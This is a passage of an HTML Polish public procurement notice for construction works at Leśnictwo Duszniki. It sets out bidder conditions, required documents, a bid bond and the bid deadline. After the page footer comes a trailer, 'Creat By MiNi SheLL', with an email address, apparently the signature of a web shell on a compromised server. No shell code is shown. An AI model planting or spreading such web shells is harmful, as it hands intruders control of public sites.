1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:1.1. sytuacji ekonomicznej lub finansowej - tj.: Zamawiający uzna<br/>warunek za spełniony w przypadku, gdy Wykonawca wykaże, że posiada ubezpieczenie od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną nie mniejszą niż 100 000,00 zł (słownie: sto tysięcy złotych<br/>00/100).W przypadku oferty składanej wspólnie przez kilku Wykonawców, warunek będzie<br/>spełniony zarówno, gdy jeden z wykonawców udokumentuje posiadanie ww. polisy, jak i wtedy<br/>gdy przedstawione zostaną polisy na łączną wymaganą sumę.1.2. zdolności technicznej lub<br/>zawodowej, tj.: Zamawiający uzna warunek za spełniony w przypadku, gdy Wykonawca wykaże,<br/>że w okresie ostatnich 5 lat przed upływem terminu składania ofert o udzielenie zamówienia, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie – wykonał przynajmniej 1<br/>robotę budowlaną, która obejmowała swym zakresem zamówienia na roboty budowlane tj.<br/>budowę, rozbudowę, przebudowę, nadbudowę lub remont budynków o wartości nie mniejszej niż<br/>300 000,00zł brutto (słownie: trzysta tysięcy złotych 00/100), a roboty te zostały wykonane<br/>należycie, w szczególności zgodnie z przepisami prawa budowlanego i prawidłowo<br/>ukończone.W przypadku oferty składanej wspólnie przez kilku Wykonawców, każdy z nich musi<br/>wykazać się przynajmniej po jednym określonym powyżej zamówieniu <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Ocena spełnienia warunków udziału w postępowaniu oraz braku podstaw do wykluczenia Wykonawcy<br/>będzie dokonana w oparciu o złożone przez Wykonawcę oświadczenia i dokumenty (z uwzględnieniem<br/>art. 128 pzp).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający na podstawie art. 274 ust. 1 pzp wezwie Wykonawcę, którego<br/>oferta została oceniona najwyżej, do złożenia w terminie nie krótszym niż 5 dni od dnia wezwania,<br/>poniższych podmiotowych środków dowodowych:2.1. dotyczących sytuacji ekonomicznej lub<br/>finansowej – tj. dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę<br/>gwarancyjną ubezpieczenia określoną w SWZ.2.2. dotyczących zdolności technicznej lub zawodowej,<br/>tj - wykazu robót budowlanych, zgodnie z Załącznikiem nr 3 do SWZ - wykonanych nie wcześniej niż w<br/>okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są:a) referencje, bądźb) inne<br/>dokumentysporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a<br/>jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty;2.3. oświadczenia wykonawcy o przynależności lub braku przynależności do<br/>grupy kapitałowej (Załącznik nr 4 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Kosztorys ofertowy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Kosztorys ofertowy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W terminie składania ofert określonym w dziale XII ust. 6 SWZ Wykonawca zobowiązany jest<br/>złożyć Zamawiającemu Ofertę zawierającą:a) formularz Oferty sporządzony wg wzoru<br/>stanowiącego załącznik nr 1 do SWZ pod rygorem nieważności, w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym,b) kosztorys<br/>ofertowy uproszczony sporządzony na podstawie przedmiaru robót stanowiącego załącznik nr<br/>12 SWZ pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym,c) oświadczenia, sporządzone zgodnie<br/>ze wzorami stanowiącymi odpowiednio załącznik nr 16A i załącznik 16B do SWZ, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym osoby/osób upoważnionych do reprezentacji podmiotu<br/>składającego oświadczenie, złożone przez:• Wykonawcę,• Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia,d) oświadczenia, sporządzone zgodnie ze wzorami stanowiącymi<br/>odpowiednio załącznik nr 16C i załącznik 16D do SWZ, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym osoby/osób upoważnionych do reprezentacji podmiotu udostępniającego Wykonawcy<br/>zasoby na zasadzie określonej w art. 118 PZP, o ile dotyczy,e) zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że<br/>Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów,<br/>jeżeli Wykonawca wykazując spełnienie warunków udziału w postępowaniu polega na<br/>zdolnościach lub sytuacji innych podmiotów; (Niewiążący wzór zobowiązania do oddania<br/>wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia stanowi<br/>załącznik nr 17 do SWZ),f) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru w celu<br/>potwierdzenia, że osoba działająca w imieniu Wykonawcy lub podmiotu udostępniającego<br/>zasoby na zasadach określonych w art. 118 PZP, jest umocowana do jego reprezentowania.<br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu<br/>poprzednim, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych<br/>baz danych, o ile Wykonawca dostarczy dane umożliwiające dostęp do tych dokumentów,g)<br/>pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia lub osoby działającej w imieniu podmiotu udostępniającego zasoby na<br/>zasadachokreślonych w art. 118 PZP.h) wadium w oryginale w postaci elektronicznej,<br/>opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia<br/>(tylko, gdy Wykonawca wnosi wadium w formie niepieniężnej). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 2 800,00 zł (słownie: dwa<br/>tysiące osiemset złotych 00/100) przed upływem terminu składania ofert.11.2. Wadium musi<br/>zostać wniesione na cały okres związania ofertą.11.3. Wadium musi zostać wniesione w jednej<br/>lub kilku z następujących form: pieniądzu, gwarancjach bankowych, gwarancjach<br/>Ogłoszenie nr 2021/BZP 00035571/01 z dnia 2021-04-19<br/>2021-04-19 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.<br/>5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (Dz. U. z 2019 r. poz. 310 z późn. zm.).11.4. Wadium w pieniądzu należy<br/>wpłacić na rachunek bankowy Zamawiającego:PKO BP 65 1020 4128 0000 1402 0035 0538 z<br/>adnotacją „wadium na roboty budowlane Leśnictwo Duszniki”.11.5. Wadium w formie pieniężnej<br/>(przelew) musi zostać zaksięgowane na rachunku Zamawiającego przed wskazanym terminem<br/>składania ofert: (dzień, godzina, minuta składania ofert).11.6. Potwierdzenie złożenia wadium w<br/>formie pieniężnej należy dołączyć do oferty.11.7. W przypadku wadium wnoszonego w innych<br/>formach niż pieniądz należy Złożyć oryginał gwarancji lub poręczenia w postaci<br/>elektronicznej.11.8. W przypadku wnoszenia wadium w formie gwarancji ubezpieczeniowej lub<br/>bankowej, gwarancja musi:a) obejmować cały okres związania ofertą;b) być samoistna,<br/>nieodwołalna, bezwarunkowa i płatna na pierwsze żądanie;c) zawierać wszystkie przypadki<br/>utraty wadium, o których mowa w pkt 12.10;d) podpisana przez upoważnionego przedstawiciela<br/>Gwaranta.11.9. Zamawiający zwraca oraz zatrzymuje wadium wraz z odsetkami w przypadkach<br/>wskazanych w art. 98 ust. 6 pzp.11.10. Oferta nie zabezpieczona wadium zostanie odrzucona<br/>na postawie art. 226 ust. 1 pkt. 14) pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaz i dowody<br/>oraz oświadczenia składa i podpisuje każdy z wykonawców we własnym imieniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduję zmiany wynikające z postępowania <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-16 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniportal za pośrednictwem formularzy komunikacji (e-puap)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-16 08:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 28 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający ogranicza liczbę wykonawców, których zaprosi do negocjacji do 3 wykonawców<br/>spełniających w najwyższym stopniu kryteria oceny ofert określone w pkt. XVII. W przypadku<br/>gdy liczba wykonawców, którzy złożyli oferty niepodlegające odrzuceniu jest mniejsza niż 3,<br/>Zamawiający zaprosi wszystkich wykonawców do negocjacji.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-01 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com